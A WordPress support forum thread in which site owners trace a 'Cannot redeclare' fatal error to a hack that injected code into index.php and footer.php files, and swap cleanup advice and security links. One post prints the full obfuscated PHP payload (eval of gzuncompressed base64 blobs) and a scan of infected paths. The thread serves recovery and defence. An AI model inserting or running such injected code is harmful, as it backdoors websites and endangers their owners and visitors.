Fatal error: Cannot redeclare _765258526()

Hi

I too have the same problem on all my WordPress sites.
I have the same message…

Fatal error: Cannot redeclare _765258526() (previously declared in…

…at the bottom of all my sites. They are all hosted together.

Any ideas/help much appreciated.

@iramaura: I can’t see any error on that site.

I have the same proble :S

I’ve removed everything on one site I manage at https://www.sparkleandsmile.co.uk/

It’s at the bottom.

The connection between sites I manage was a plugin called Simple “Coming soon” And “Under construction”

As you can see at https://www.perfectlyframed.com/

Help! What’s going on?

Guys. I had this problem this morning. I think it stemmed from the fact that my site was hacked over the last couple of days which led to a malware warning on some of my pages from Google. I searched for the solution to the hack, which I fixed last night. It involved deleting some files and some malicious code inside some WP files. Anyway, I cleaned it all up last night and thought I had left it perfect.

However, this morning I noticed the Fatal error: Cannot redeclare _765258526() error at the bottom of the screen.

Firstly, my index.php file had some malicious code at the bottom which I hadn’t seen – I deleted that but it didn’t fix the problem. I looked in footer.php but couldn’t see anything wrong with it. However, I restored it from a backup and it fixed the problem.

So, it’s something to do with footer.php but I don’t know exactly what. If you have a backup, restore that file. If not, perhaps someone with some more knowledge could comb through and find out what’s causing it.

I also strongly recommend you to check around your site(s) and make sure they havn’t been hacked. This hack affected all my sites (WordPress and otherwise) on my hosting account (Dreamhost) – in that all the index files were infected with malicious code.

Thanks @saynototheoffice I’ve just checked an index.php file on one of my sites and it had horrid… <?php eval(gzuncompress …. code at the bottom of it.

I then checked other WordPress sites I manage and the same code appeared. This is the first time I’ve been hacked and don’t know what to do, so appreciate you reply.

I’ve contacted my hosting company as it looks like it all happened yesterday at 4pm as the index.php files have all been modified at that time.

Does anyone know a solution? WordPress Gurus?
Many thanks.

That’s exactly what happened to me. Looks like you’ve been hit by the same hack. Are you on Dreamhost? Did you get a load of hits from a bot in Russia last week? The solution I followed was from this page:

https://redleg-redleg.blogspot.com/2011/11/malicious-software-hosted-on-nlai.html#more

In addition, I had to clean that horrible code out of all the index.php files of each site on my account. That solved the malware issue. Finally, I replaced the footer.php file as described above and that got rid of the warning at the bottom of the page.

My first hack too. Hope whoever does this falls under a bus.

hi guys!

well, I got help from my ISP and yes, I was hacked too, mainly due to my very weak ISP profile/account password. I’ve strenghtened it.

the follwoing code was embeded into some crucial files of wordpress:

<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ==')));  eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?>

pretty long crap. I’ve found it in the following files:

/home/aimaeaco/public_html/leda/wp-includes/theme-compat/footer.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/themes/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/themes/twentyeleven/footer.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/themes/duotive-three/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/themes/beback/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/themes/twentyten/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/plugins/wordpress-popular-posts/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/plugins/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/plugins/sexybookmarks/js/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/plugins/sexybookmarks/includes/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/uploads/shareaholic/spritegen/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-content/uploads/shareaholic/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy
/home/aimaeaco/public_html/leda/wp-admin/user/index.php: Suspicious(base64_decode): ncompress(base64_decode(‘eF6VlMmy

what I did was, that I removed that malicious php line from the listed files. also, I’ve downloaded some security plugins for my websites.

here is a nice collection: https://www.dailytechpost.com/index.php/11-best-wordpress-security-plugins/

Some info on how to deal with a hacked site:
https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://www.ads-software.com/support/topic/268083#post-1065779
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
https://ottopress.com/2009/hacked-wordpress-backdoors/
https://sitecheck.sucuri.net/scanner/

hi folks!

@keesiemeijer: thanks for the security links.

has anyobody fixed the site yet? please share the experience.

many thanks!

I’ve been in touch with my hosting company who have been no help whatsoever.

I’m going through the steps..

I’ve downloaded ClamXav to scan my computer as suggested on a few other links.

Nothing fixed yet!

@iramaura Yes – I managed to fix my site – look at my post above.

hi again!

@saynototheoffice: I meant the other two guys who had the same issue. as a matter of fact, I’ve had a russian bot attack, but no attention I payed.

@mattwhyatt: my ISP reacted immediately, I was slow. maybe consider migrating to another.

I’m still in learning phase, so I’ll pay more attention to security – bit glad this issue occurred.

thanks for Your assistance.

cheers!

OK – I just spent some more time cleaning this up and used this script to detect malicious code:

https://redleg-redleg.blogspot.com/p/simple-script-to-find-base64decode-in.html

What I found was that this attack basically inserts the code into any file called ‘index’ on the hosting account – of which there are quite a few.

@saynototheoffice: That’s a great link to the script detector. Many thanks. My hosting have come back and said that they are 99.9% secure and the attack happened through one of my sites. That’s it. No helping but happy to take my money.

I’ve got some code removing to be doing.

Thanks everyone for their help.